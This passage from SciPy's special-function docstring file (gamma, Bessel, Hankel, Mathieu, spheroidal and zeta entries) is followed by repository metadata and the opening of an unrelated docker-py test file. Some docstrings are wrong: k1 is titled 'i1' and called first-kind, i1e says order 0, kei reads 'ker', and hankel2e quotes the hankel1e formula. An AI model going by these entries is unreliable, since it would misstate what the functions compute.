gdtr : CDF of the gamma distribution.
gdtria : Inverse with respect to `a` of `gdtr(a, b, x)`.
gdtrix : Inverse with respect to `x` of `gdtr(a, b, x)`.
Examples
--------
First evaluate `gdtr`.
>>> p = gdtr(1.2, 3.4, 5.6)
>>> print(p)
0.94378087442
Verify the inverse.
>>> gdtrib(1.2, p, 5.6)
3.3999999999723882
""")
add_newdoc("scipy.special", "gdtrix",
"""
gdtrix(a, b, p, out=None)
Inverse of gdtr vs x.
Returns the inverse with respect to the parameter `x` of ``p =
gdtr(a, b, x)``, the cumulative distribution function of the gamma
distribution. This is also known as the p'th quantile of the
distribution.
Parameters
----------
a : array_like
`a` parameter values of `gdtr(a, b, x)`. `1/a` is the "scale"
parameter of the gamma distribution.
b : array_like
`b` parameter values of `gdtr(a, b, x)`. `b` is the "shape" parameter
of the gamma distribution.
p : array_like
Probability values.
out : ndarray, optional
If a fourth argument is given, it must be a numpy.ndarray whose size
matches the broadcast result of `a`, `b` and `x`. `out` is then the
array returned by the function.
Returns
-------
x : ndarray
Values of the `x` parameter such that `p = gdtr(a, b, x)`.
See Also
--------
gdtr : CDF of the gamma distribution.
gdtria : Inverse with respect to `a` of `gdtr(a, b, x)`.
gdtrib : Inverse with respect to `b` of `gdtr(a, b, x)`.
Examples
--------
First evaluate `gdtr`.
>>> p = gdtr(1.2, 3.4, 5.6)
>>> print(p)
0.94378087442
Verify the inverse.
>>> gdtrix(1.2, 3.4, p)
5.5999999999999996
""")
add_newdoc("scipy.special", "hankel1",
"""
hankel1(v, z)
Hankel function of the first kind
Parameters
----------
v : float
Order
z : float or complex
Argument
""")
add_newdoc("scipy.special", "hankel1e",
"""
hankel1e(v, z)
Exponentially scaled Hankel function of the first kind
Defined as::
hankel1e(v,z) = hankel1(v,z) * exp(-1j * z)
Parameters
----------
v : float
Order
z : complex
Argument
""")
add_newdoc("scipy.special", "hankel2",
"""
hankel2(v, z)
Hankel function of the second kind
Parameters
----------
v : float
Order
z : complex
Argument
""")
add_newdoc("scipy.special", "hankel2e",
"""
hankel2e(v, z)
Exponentially scaled Hankel function of the second kind
Defined as::
hankel1e(v,z) = hankel1(v,z) * exp(1j * z)
Parameters
----------
v : float
Order
z : complex
Argument
""")
add_newdoc("scipy.special", "hyp1f1",
"""
hyp1f1(a, b, x)
Confluent hypergeometric function 1F1(a, b; x)
""")
add_newdoc("scipy.special", "hyp1f2",
"""
hyp1f2(a, b, c, x)
Hypergeometric function 1F2 and error estimate
Returns
-------
y
Value of the function
err
Error estimate
""")
add_newdoc("scipy.special", "hyp2f0",
"""
hyp2f0(a, b, x, type)
Hypergeometric function 2F0 in y and an error estimate
The parameter `type` determines a convergence factor and can be
either 1 or 2.
Returns
-------
y
Value of the function
err
Error estimate
""")
add_newdoc("scipy.special", "hyp2f1",
"""
hyp2f1(a, b, c, z)
Gauss hypergeometric function 2F1(a, b; c; z).
""")
add_newdoc("scipy.special", "hyp3f0",
"""
hyp3f0(a, b, c, x)
Hypergeometric function 3F0 in y and an error estimate
Returns
-------
y
Value of the function
err
Error estimate
""")
add_newdoc("scipy.special", "hyperu",
"""
hyperu(a, b, x)
Confluent hypergeometric function U(a, b, x) of the second kind
""")
add_newdoc("scipy.special", "i0",
"""
i0(x)
Modified Bessel function of order 0
""")
add_newdoc("scipy.special", "i0e",
"""
i0e(x)
Exponentially scaled modified Bessel function of order 0.
Defined as::
i0e(x) = exp(-abs(x)) * i0(x).
""")
add_newdoc("scipy.special", "i1",
"""
i1(x)
Modified Bessel function of order 1
""")
add_newdoc("scipy.special", "i1e",
"""
i1e(x)
Exponentially scaled modified Bessel function of order 0.
Defined as::
i1e(x) = exp(-abs(x)) * i1(x)
""")
add_newdoc("scipy.special", "it2i0k0",
"""
it2i0k0(x)
Integrals related to modified Bessel functions of order 0
Returns
-------
ii0
``integral((i0(t)-1)/t, t=0..x)``
ik0
``int(k0(t)/t,t=x..inf)``
""")
add_newdoc("scipy.special", "it2j0y0",
"""
it2j0y0(x)
Integrals related to Bessel functions of order 0
Returns
-------
ij0
``integral((1-j0(t))/t, t=0..x)``
iy0
``integral(y0(t)/t, t=x..inf)``
""")
add_newdoc("scipy.special", "it2struve0",
"""
it2struve0(x)
Integral related to Struve function of order 0
Returns
-------
i
``integral(H0(t)/t, t=x..inf)``
""")
add_newdoc("scipy.special", "itairy",
"""
itairy(x)
Integrals of Airy functios
Calculates the integral of Airy functions from 0 to x
Returns
-------
Apt, Bpt
Integrals for positive arguments
Ant, Bnt
Integrals for negative arguments
""")
add_newdoc("scipy.special", "iti0k0",
"""
iti0k0(x)
Integrals of modified Bessel functions of order 0
Returns simple integrals from 0 to x of the zeroth order modified
Bessel functions i0 and k0.
Returns
-------
ii0, ik0
""")
add_newdoc("scipy.special", "itj0y0",
"""
itj0y0(x)
Integrals of Bessel functions of order 0
Returns simple integrals from 0 to x of the zeroth order Bessel
functions j0 and y0.
Returns
-------
ij0, iy0
""")
add_newdoc("scipy.special", "itmodstruve0",
"""
itmodstruve0(x)
Integral of the modified Struve function of order 0
Returns
-------
i
``integral(L0(t), t=0..x)``
""")
add_newdoc("scipy.special", "itstruve0",
"""
itstruve0(x)
Integral of the Struve function of order 0
Returns
-------
i
``integral(H0(t), t=0..x)``
""")
add_newdoc("scipy.special", "iv",
"""
iv(v,z)
Modified Bessel function of the first kind of real order
Parameters
----------
v
Order. If z is of real type and negative, v must be integer valued.
z
Argument.
""")
add_newdoc("scipy.special", "ive",
"""
ive(v,z)
Exponentially scaled modified Bessel function of the first kind
Defined as::
ive(v,z) = iv(v,z) * exp(-abs(z.real))
""")
add_newdoc("scipy.special", "j0",
"""
j0(x)
Bessel function the first kind of order 0
""")
add_newdoc("scipy.special", "j1",
"""
j1(x)
Bessel function of the first kind of order 1
""")
add_newdoc("scipy.special", "jn",
"""
jn(n, x)
Bessel function of the first kind of integer order n
""")
add_newdoc("scipy.special", "jv",
"""
jv(v, z)
Bessel function of the first kind of real order v
""")
add_newdoc("scipy.special", "jve",
"""
jve(v, z)
Exponentially scaled Bessel function of order v
Defined as::
jve(v,z) = jv(v,z) * exp(-abs(z.imag))
""")
add_newdoc("scipy.special", "k0",
"""
k0(x)
Modified Bessel function K of order 0
Modified Bessel function of the second kind (sometimes called the
third kind) of order 0.
""")
add_newdoc("scipy.special", "k0e",
"""
k0e(x)
Exponentially scaled modified Bessel function K of order 0
Defined as::
k0e(x) = exp(x) * k0(x).
""")
add_newdoc("scipy.special", "k1",
"""
i1(x)
Modified Bessel function of the first kind of order 1
""")
add_newdoc("scipy.special", "k1e",
"""
k1e(x)
Exponentially scaled modified Bessel function K of order 1
Defined as::
k1e(x) = exp(x) * k1(x)
""")
add_newdoc("scipy.special", "kei",
"""
kei(x)
Kelvin function ker
""")
add_newdoc("scipy.special", "keip",
"""
keip(x)
Derivative of the Kelvin function kei
""")
add_newdoc("scipy.special", "kelvin",
"""
kelvin(x)
Kelvin functions as complex numbers
Returns
-------
Be, Ke, Bep, Kep
The tuple (Be, Ke, Bep, Kep) contains complex numbers
representing the real and imaginary Kelvin functions and their
derivatives evaluated at x. For example, kelvin(x)[0].real =
ber x and kelvin(x)[0].imag = bei x with similar relationships
for ker and kei.
""")
add_newdoc("scipy.special", "ker",
"""
ker(x)
Kelvin function ker
""")
add_newdoc("scipy.special", "kerp",
"""
kerp(x)
Derivative of the Kelvin function ker
""")
add_newdoc("scipy.special", "kn",
"""
kn(n, x)
Modified Bessel function of the second kind of integer order n
These are also sometimes called functions of the third kind.
""")
add_newdoc("scipy.special", "kolmogi",
"""
kolmogi(p)
Inverse function to kolmogorov
Returns y such that ``kolmogorov(y) == p``.
""")
add_newdoc("scipy.special", "kolmogorov",
"""
kolmogorov(y)
Complementary cumulative distribution function of Kolmogorov distribution
Returns the complementary cumulative distribution function of
Kolmogorov's limiting distribution (Kn* for large n) of a
two-sided test for equality between an empirical and a theoretical
distribution. It is equal to the (limit as n->infinity of the)
probability that sqrt(n) * max absolute deviation > y.
""")
add_newdoc("scipy.special", "kv",
"""
kv(v,z)
Modified Bessel function of the second kind of real order v
Returns the modified Bessel function of the second kind (sometimes
called the third kind) for real order v at complex z.
""")
add_newdoc("scipy.special", "kve",
"""
kve(v,z)
Exponentially scaled modified Bessel function of the second kind.
Returns the exponentially scaled, modified Bessel function of the
second kind (sometimes called the third kind) for real order v at
complex z::
kve(v,z) = kv(v,z) * exp(z)
""")
add_newdoc("scipy.special", "log1p",
"""
log1p(x)
Calculates log(1+x) for use when x is near zero
""")
add_newdoc('scipy.special', 'logit',
"""
logit(x)
Logit ufunc for ndarrays.
The logit function is defined as logit(p) = log(p/(1-p)).
Note that logit(0) = -inf, logit(1) = inf, and logit(p)
for p<0 or p>1 yields nan.
.. versionadded:: 0.10.0
Parameters
----------
x : ndarray
The ndarray to apply logit to element-wise.
Returns
-------
out : ndarray
An ndarray of the same shape as x. Its entries
are logit of the corresponding entry of x.
Notes
-----
As a ufunc logit takes a number of optional
keyword arguments. For more information
see `ufuncs <http://docs.scipy.org/doc/numpy/reference/ufuncs.html>`_
""")
add_newdoc("scipy.special", "lpmv",
"""
lpmv(m, v, x)
Associated legendre function of integer order.
Parameters
----------
m : int
Order
v : real
Degree. Must be ``v>-m-1`` or ``v<m``
x : complex
Argument. Must be ``|x| <= 1``.
""")
add_newdoc("scipy.special", "mathieu_a",
"""
mathieu_a(m,q)
Characteristic value of even Mathieu functions
Returns the characteristic value for the even solution,
``ce_m(z,q)``, of Mathieu's equation.
""")
add_newdoc("scipy.special", "mathieu_b",
"""
mathieu_b(m,q)
Characteristic value of odd Mathieu functions
Returns the characteristic value for the odd solution,
``se_m(z,q)``, of Mathieu's equation.
""")
add_newdoc("scipy.special", "mathieu_cem",
"""
mathieu_cem(m,q,x)
Even Mathieu function and its derivative
Returns the even Mathieu function, ``ce_m(x,q)``, of order m and
parameter q evaluated at x (given in degrees). Also returns the
derivative with respect to x of ce_m(x,q)
Parameters
----------
m
Order of the function
q
Parameter of the function
x
Argument of the function, *given in degrees, not radians*
Returns
-------
y
Value of the function
yp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "mathieu_modcem1",
"""
mathieu_modcem1(m, q, x)
Even modified Mathieu function of the first kind and its derivative
Evaluates the even modified Mathieu function of the first kind,
``Mc1m(x,q)``, and its derivative at `x` for order m and parameter
`q`.
Returns
-------
y
Value of the function
yp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "mathieu_modcem2",
"""
mathieu_modcem2(m, q, x)
Even modified Mathieu function of the second kind and its derivative
Evaluates the even modified Mathieu function of the second kind,
Mc2m(x,q), and its derivative at x (given in degrees) for order m
and parameter q.
Returns
-------
y
Value of the function
yp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "mathieu_modsem1",
"""
mathieu_modsem1(m,q,x)
Odd modified Mathieu function of the first kind and its derivative
Evaluates the odd modified Mathieu function of the first kind,
Ms1m(x,q), and its derivative at x (given in degrees) for order m
and parameter q.
Returns
-------
y
Value of the function
yp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "mathieu_modsem2",
"""
mathieu_modsem2(m, q, x)
Odd modified Mathieu function of the second kind and its derivative
Evaluates the odd modified Mathieu function of the second kind,
Ms2m(x,q), and its derivative at x (given in degrees) for order m
and parameter q.
Returns
-------
y
Value of the function
yp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "mathieu_sem",
"""
mathieu_sem(m, q, x)
Odd Mathieu function and its derivative
Returns the odd Mathieu function, se_m(x,q), of order m and
parameter q evaluated at x (given in degrees). Also returns the
derivative with respect to x of se_m(x,q).
Parameters
----------
m
Order of the function
q
Parameter of the function
x
Argument of the function, *given in degrees, not radians*.
Returns
-------
y
Value of the function
yp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "modfresnelm",
"""
modfresnelm(x)
Modified Fresnel negative integrals
Returns
-------
fm
Integral ``F_-(x)``: ``integral(exp(-1j*t*t),t=x..inf)``
km
Integral ``K_-(x)``: ``1/sqrt(pi)*exp(1j*(x*x+pi/4))*fp``
""")
add_newdoc("scipy.special", "modfresnelp",
"""
modfresnelp(x)
Modified Fresnel positive integrals
Returns
-------
fp
Integral ``F_+(x)``: ``integral(exp(1j*t*t),t=x..inf)``
kp
Integral ``K_+(x)``: ``1/sqrt(pi)*exp(-1j*(x*x+pi/4))*fp``
""")
add_newdoc("scipy.special", "modstruve",
"""
modstruve(v, x)
Modified Struve function
Returns the modified Struve function Lv(x) of order v at x, x must
be positive unless v is an integer.
""")
add_newdoc("scipy.special", "nbdtr",
"""
nbdtr(k, n, p)
Negative binomial cumulative distribution function
Returns the sum of the terms 0 through k of the negative binomial
distribution::
sum((n+j-1)Cj p**n (1-p)**j,j=0..k).
In a sequence of Bernoulli trials this is the probability that k
or fewer failures precede the nth success.
""")
add_newdoc("scipy.special", "nbdtrc",
"""
nbdtrc(k,n,p)
Negative binomial survival function
Returns the sum of the terms k+1 to infinity of the negative
binomial distribution.
""")
add_newdoc("scipy.special", "nbdtri",
"""
nbdtri(k, n, y)
Inverse of nbdtr vs p
Finds the argument p such that ``nbdtr(k,n,p) = y``.
""")
add_newdoc("scipy.special", "nbdtrik",
"""
nbdtrik(y,n,p)
Inverse of nbdtr vs k
Finds the argument k such that ``nbdtr(k,n,p) = y``.
""")
add_newdoc("scipy.special", "nbdtrin",
"""
nbdtrin(k,y,p)
Inverse of nbdtr vs n
Finds the argument n such that ``nbdtr(k,n,p) = y``.
""")
add_newdoc("scipy.special", "ncfdtr",
"""
""")
add_newdoc("scipy.special", "ncfdtri",
"""
""")
add_newdoc("scipy.special", "ncfdtrifn",
"""
""")
add_newdoc("scipy.special", "ncfdtridfd",
"""
""")
add_newdoc("scipy.special", "ncfdtridfn",
"""
""")
add_newdoc("scipy.special", "ncfdtrinc",
"""
""")
add_newdoc("scipy.special", "nctdtr",
"""
""")
add_newdoc("scipy.special", "nctdtridf",
"""
""")
add_newdoc("scipy.special", "nctdtrinc",
"""
""")
add_newdoc("scipy.special", "nctdtrit",
"""
""")
add_newdoc("scipy.special", "ndtr",
"""
ndtr(x)
Gaussian cumulative distribution function
Returns the area under the standard Gaussian probability
density function, integrated from minus infinity to x::
1/sqrt(2*pi) * integral(exp(-t**2 / 2),t=-inf..x)
""")
add_newdoc("scipy.special", "nrdtrimn",
"""
""")
add_newdoc("scipy.special", "nrdtrisd",
"""
""")
add_newdoc("scipy.special", "log_ndtr",
"""
log_ndtr(x)
Logarithm of Gaussian cumulative distribution function
Returns the log of the area under the standard Gaussian probability
density function, integrated from minus infinity to x::
log(1/sqrt(2*pi) * integral(exp(-t**2 / 2), t=-inf..x))
""")
add_newdoc("scipy.special", "ndtri",
"""
ndtri(y)
Inverse of ndtr vs x
Returns the argument x for which the area under the Gaussian
probability density function (integrated from minus infinity to x)
is equal to y.
""")
add_newdoc("scipy.special", "obl_ang1",
"""
obl_ang1(m, n, c, x)
Oblate spheroidal angular function of the first kind and its derivative
Computes the oblate sheroidal angular function of the first kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "obl_ang1_cv",
"""
obl_ang1_cv(m, n, c, cv, x)
Oblate sheroidal angular function obl_ang1 for precomputed characteristic value
Computes the oblate sheroidal angular function of the first kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``. Requires
pre-computed characteristic value.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "obl_cv",
"""
obl_cv(m, n, c)
Characteristic value of oblate spheroidal function
Computes the characteristic value of oblate spheroidal wave
functions of order m,n (n>=m) and spheroidal parameter c.
""")
add_newdoc("scipy.special", "obl_rad1",
"""
obl_rad1(m,n,c,x)
Oblate spheroidal radial function of the first kind and its derivative
Computes the oblate sheroidal radial function of the first kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "obl_rad1_cv",
"""
obl_rad1_cv(m,n,c,cv,x)
Oblate sheroidal radial function obl_rad1 for precomputed characteristic value
Computes the oblate sheroidal radial function of the first kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``. Requires
pre-computed characteristic value.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "obl_rad2",
"""
obl_rad2(m,n,c,x)
Oblate spheroidal radial function of the second kind and its derivative.
Computes the oblate sheroidal radial function of the second kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "obl_rad2_cv",
"""
obl_rad2_cv(m,n,c,cv,x)
Oblate sheroidal radial function obl_rad2 for precomputed characteristic value
Computes the oblate sheroidal radial function of the second kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``. Requires
pre-computed characteristic value.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "pbdv",
"""
pbdv(v, x)
Parabolic cylinder function D
Returns (d,dp) the parabolic cylinder function Dv(x) in d and the
derivative, Dv'(x) in dp.
Returns
-------
d
Value of the function
dp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "pbvv",
"""
pbvv(v,x)
Parabolic cylinder function V
Returns the parabolic cylinder function Vv(x) in v and the
derivative, Vv'(x) in vp.
Returns
-------
v
Value of the function
vp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "pbwa",
"""
pbwa(a,x)
Parabolic cylinder function W
Returns the parabolic cylinder function W(a,x) in w and the
derivative, W'(a,x) in wp.
.. warning::
May not be accurate for large (>5) arguments in a and/or x.
Returns
-------
w
Value of the function
wp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "pdtr",
"""
pdtr(k, m)
Poisson cumulative distribution function
Returns the sum of the first k terms of the Poisson distribution:
sum(exp(-m) * m**j / j!, j=0..k) = gammaincc( k+1, m). Arguments
must both be positive and k an integer.
""")
add_newdoc("scipy.special", "pdtrc",
"""
pdtrc(k, m)
Poisson survival function
Returns the sum of the terms from k+1 to infinity of the Poisson
distribution: sum(exp(-m) * m**j / j!, j=k+1..inf) = gammainc(
k+1, m). Arguments must both be positive and k an integer.
""")
add_newdoc("scipy.special", "pdtri",
"""
pdtri(k,y)
Inverse to pdtr vs m
Returns the Poisson variable m such that the sum from 0 to k of
the Poisson density is equal to the given probability y:
calculated by gammaincinv(k+1, y). k must be a nonnegative
integer and y between 0 and 1.
""")
add_newdoc("scipy.special", "pdtrik",
"""
pdtrik(p,m)
Inverse to pdtr vs k
Returns the quantile k such that ``pdtr(k, m) = p``
""")
add_newdoc("scipy.special", "poch",
"""
poch(z, m)
Rising factorial (z)_m
The Pochhammer symbol (rising factorial), is defined as::
(z)_m = gamma(z + m) / gamma(z)
For positive integer `m` it reads::
(z)_m = z * (z + 1) * ... * (z + m - 1)
""")
add_newdoc("scipy.special", "pro_ang1",
"""
pro_ang1(m,n,c,x)
Prolate spheroidal angular function of the first kind and its derivative
Computes the prolate sheroidal angular function of the first kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "pro_ang1_cv",
"""
pro_ang1_cv(m,n,c,cv,x)
Prolate sheroidal angular function pro_ang1 for precomputed characteristic value
Computes the prolate sheroidal angular function of the first kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``. Requires
pre-computed characteristic value.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "pro_cv",
"""
pro_cv(m,n,c)
Characteristic value of prolate spheroidal function
Computes the characteristic value of prolate spheroidal wave
functions of order m,n (n>=m) and spheroidal parameter c.
""")
add_newdoc("scipy.special", "pro_rad1",
"""
pro_rad1(m,n,c,x)
Prolate spheroidal radial function of the first kind and its derivative
Computes the prolate sheroidal radial function of the first kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "pro_rad1_cv",
"""
pro_rad1_cv(m,n,c,cv,x)
Prolate sheroidal radial function pro_rad1 for precomputed characteristic value
Computes the prolate sheroidal radial function of the first kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``. Requires
pre-computed characteristic value.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "pro_rad2",
"""
pro_rad2(m,n,c,x)
Prolate spheroidal radial function of the secon kind and its derivative
Computes the prolate sheroidal radial function of the second kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and |x|<1.0.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "pro_rad2_cv",
"""
pro_rad2_cv(m,n,c,cv,x)
Prolate sheroidal radial function pro_rad2 for precomputed characteristic value
Computes the prolate sheroidal radial function of the second kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``. Requires
pre-computed characteristic value.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "psi",
"""
psi(z)
Digamma function
The derivative of the logarithm of the gamma function evaluated at
z (also called the digamma function).
""")
add_newdoc("scipy.special", "radian",
"""
radian(d, m, s)
Convert from degrees to radians
Returns the angle given in (d)egrees, (m)inutes, and (s)econds in
radians.
""")
add_newdoc("scipy.special", "rgamma",
"""
rgamma(z)
Gamma function inverted
Returns ``1/gamma(x)``
""")
add_newdoc("scipy.special", "round",
"""
round(x)
Round to nearest integer
Returns the nearest integer to x as a double precision floating
point result. If x ends in 0.5 exactly, the nearest even integer
is chosen.
""")
add_newdoc("scipy.special", "shichi",
"""
shichi(x)
Hyperbolic sine and cosine integrals
Returns
-------
shi
``integral(sinh(t)/t,t=0..x)``
chi
``eul + ln x + integral((cosh(t)-1)/t,t=0..x)``
where ``eul`` is Euler's constant.
""")
add_newdoc("scipy.special", "sici",
"""
sici(x)
Sine and cosine integrals
Returns
-------
si
``integral(sin(t)/t,t=0..x)``
ci
``eul + ln x + integral((cos(t) - 1)/t,t=0..x)``
where ``eul`` is Euler's constant.
""")
add_newdoc("scipy.special", "sindg",
"""
sindg(x)
Sine of angle given in degrees
""")
add_newdoc("scipy.special", "smirnov",
"""
smirnov(n,e)
Kolmogorov-Smirnov complementary cumulative distribution function
Returns the exact Kolmogorov-Smirnov complementary cumulative
distribution function (Dn+ or Dn-) for a one-sided test of
equality between an empirical and a theoretical distribution. It
is equal to the probability that the maximum difference between a
theoretical distribution and an empirical one based on n samples
is greater than e.
""")
add_newdoc("scipy.special", "smirnovi",
"""
smirnovi(n,y)
Inverse to smirnov
Returns ``e`` such that ``smirnov(n,e) = y``.
""")
add_newdoc("scipy.special", "spence",
"""
spence(x)
Dilogarithm integral
Returns the dilogarithm integral::
-integral(log t / (t-1),t=1..x)
""")
add_newdoc("scipy.special", "stdtr",
"""
stdtr(df,t)
Student t distribution cumulative density function
Returns the integral from minus infinity to t of the Student t
distribution with df > 0 degrees of freedom::
gamma((df+1)/2)/(sqrt(df*pi)*gamma(df/2)) *
integral((1+x**2/df)**(-df/2-1/2), x=-inf..t)
""")
add_newdoc("scipy.special", "stdtridf",
"""
stdtridf(p,t)
Inverse of stdtr vs df
Returns the argument df such that stdtr(df,t) is equal to p.
""")
add_newdoc("scipy.special", "stdtrit",
"""
stdtrit(df,p)
Inverse of stdtr vs t
Returns the argument t such that stdtr(df,t) is equal to p.
""")
add_newdoc("scipy.special", "struve",
"""
struve(v,x)
Struve function
Computes the struve function Hv(x) of order v at x, x must be
positive unless v is an integer.
""")
add_newdoc("scipy.special", "tandg",
"""
tandg(x)
Tangent of angle x given in degrees.
""")
add_newdoc("scipy.special", "tklmbda",
"""
tklmbda(x, lmbda)
Tukey-Lambda cumulative distribution function
""")
add_newdoc("scipy.special", "wofz",
"""
wofz(z)
Faddeeva function
Returns the value of the Faddeeva function for complex argument::
exp(-z**2)*erfc(-i*z)
References
----------
.. [1] Steven G. Johnson, Faddeeva W function implementation.
http://ab-initio.mit.edu/Faddeeva
""")
add_newdoc("scipy.special", "xlogy",
"""
xlogy(x, y)
Compute ``x*log(y)`` so that the result is 0 if `x = 0`.
.. versionadded:: 0.13.0
Parameters
----------
x : array_like
Multiplier
y : array_like
Argument
Returns
-------
z : array_like
Computed x*log(y)
""")
add_newdoc("scipy.special", "xlog1py",
"""
xlog1py(x, y)
Compute ``x*log1p(y)`` so that the result is 0 if `x = 0`.
.. versionadded:: 0.13.0
Parameters
----------
x : array_like
Multiplier
y : array_like
Argument
Returns
-------
z : array_like
Computed x*log1p(y)
""")
add_newdoc("scipy.special", "y0",
"""
y0(x)
Bessel function of the second kind of order 0
Returns the Bessel function of the second kind of order 0 at x.
""")
add_newdoc("scipy.special", "y1",
"""
y1(x)
Bessel function of the second kind of order 1
Returns the Bessel function of the second kind of order 1 at x.
""")
add_newdoc("scipy.special", "yn",
"""
yn(n,x)
Bessel function of the second kind of integer order
Returns the Bessel function of the second kind of integer order n
at x.
""")
add_newdoc("scipy.special", "yv",
"""
yv(v,z)
Bessel function of the second kind of real order
Returns the Bessel function of the second kind of real order v at
complex z.
""")
add_newdoc("scipy.special", "yve",
"""
yve(v,z)
Exponentially scaled Bessel function of the second kind of real order
Returns the exponentially scaled Bessel function of the second
kind of real order v at complex z::
yve(v,z) = yv(v,z) * exp(-abs(z.imag))
""")
add_newdoc("scipy.special", "zeta",
"""
zeta(x, q)
Hurwitz zeta function
The Riemann zeta function of two arguments (also known as the
Hurwitz zeta funtion).
This function is defined as
.. math:: \\zeta(x, q) = \\sum_{k=0}^{\\infty} 1 / (k+q)^x,
where ``x > 1`` and ``q > 0``.
See also
--------
zetac
""")
add_newdoc("scipy.special", "zetac",
"""
zetac(x)
Riemann zeta function minus 1.
This function is defined as
.. math:: \\zeta(x) = \\sum_{k=2}^{\\infty} 1 / k^x,
where ``x > 1``.
See Also
--------
zeta
""")
add_newdoc("scipy.special", "_struve_asymp_large_z",
"""
_struve_asymp_large_z(v, z, is_h)
Internal function for testing struve & modstruve
Evaluates using asymptotic expansion
Returns
-------
v, err
""")
add_newdoc("scipy.special", "_struve_power_series",
"""
_struve_power_series(v, z, is_h)
Internal function for testing struve & modstruve
Evaluates using power series
Returns
-------
v, err
""")
add_newdoc("scipy.special", "_struve_bessel_series",
"""
_struve_bessel_series(v, z, is_h)
Internal function for testing struve & modstruve
Evaluates using Bessel function series
Returns
-------
v, err
""")
| {
"content_hash": "a6f4e6d0bdf80dcbfd0b528988f9d801",
"timestamp": "",
"source": "github",
"line_count": 2732,
"max_line_length": 84,
"avg_line_length": 20.612005856515374,
"alnum_prop": 0.5819896292086945,
"repo_name": "RobertABT/heightmap",
"id": "a1027263104d6c57e5606133be607c210db75d31",
"size": "56683",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "build/scipy/scipy/special/add_newdocs.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "25165856"
},
{
"name": "C++",
"bytes": "5251754"
},
{
"name": "CSS",
"bytes": "17123"
},
{
"name": "FORTRAN",
"bytes": "6353469"
},
{
"name": "JavaScript",
"bytes": "816504"
},
{
"name": "M",
"bytes": "66"
},
{
"name": "Matlab",
"bytes": "4280"
},
{
"name": "Objective-C",
"bytes": "284551"
},
{
"name": "Python",
"bytes": "13223936"
},
{
"name": "TeX",
"bytes": "37261"
}
],
"symlink_target": ""
} |
# -*- coding: utf-8 -*-
import base64
import json
import os
import os.path
import shutil
import tempfile
import pytest
import six
from docker.client import Client
from docker.constants import DEFAULT_DOCKER_API_VERSION
from docker.errors import DockerException
from docker.utils import (
parse_repository_tag, parse_host, convert_filters, kwargs_from_env,
create_host_config, Ulimit, LogConfig, parse_bytes, parse_env_file,
exclude_paths, convert_volume_binds, decode_json_header
)
from docker.utils.ports import build_port_bindings, split_port
from docker.auth import (
resolve_repository_name, resolve_authconfig, encode_header
)
from . import base
from .helpers import make_tree
TEST_CERT_DIR = os.path.join(
os.path.dirname(__file__),
'testdata/certs',
)
class HostConfigTest(base.BaseTestCase):
def test_create_host_config_no_options(self):
config = create_host_config(version='1.19')
self.assertFalse('NetworkMode' in config)
def test_create_host_config_no_options_newer_api_version(self):
config = create_host_config(version='1.20')
self.assertEqual(config['NetworkMode'], 'default')
def test_create_host_config_invalid_cpu_cfs_types(self):
with pytest.raises(TypeError):
create_host_config(version='1.20', cpu_quota='0')
with pytest.raises(TypeError):
create_host_config(version='1.20', cpu_period='0')
with pytest.raises(TypeError):
create_host_config(version='1.20', cpu_quota=23.11)
with pytest.raises(TypeError):
create_host_config(version='1.20', cpu_period=1999.0)
def test_create_host_config_with_cpu_quota(self):
config = create_host_config(version='1.20', cpu_quota=1999)
self.assertEqual(config.get('CpuQuota'), 1999)
def test_create_host_config_with_cpu_period(self):
config = create_host_config(version='1.20', cpu_period=1999)
self.assertEqual(config.get('CpuPeriod'), 1999)
class UlimitTest(base.BaseTestCase):
def test_create_host_config_dict_ulimit(self):
ulimit_dct = {'name': 'nofile', 'soft': 8096}
config = create_host_config(
ulimits=[ulimit_dct], version=DEFAULT_DOCKER_API_VERSION
)
self.assertIn('Ulimits', config)
self.assertEqual(len(config['Ulimits']), 1)
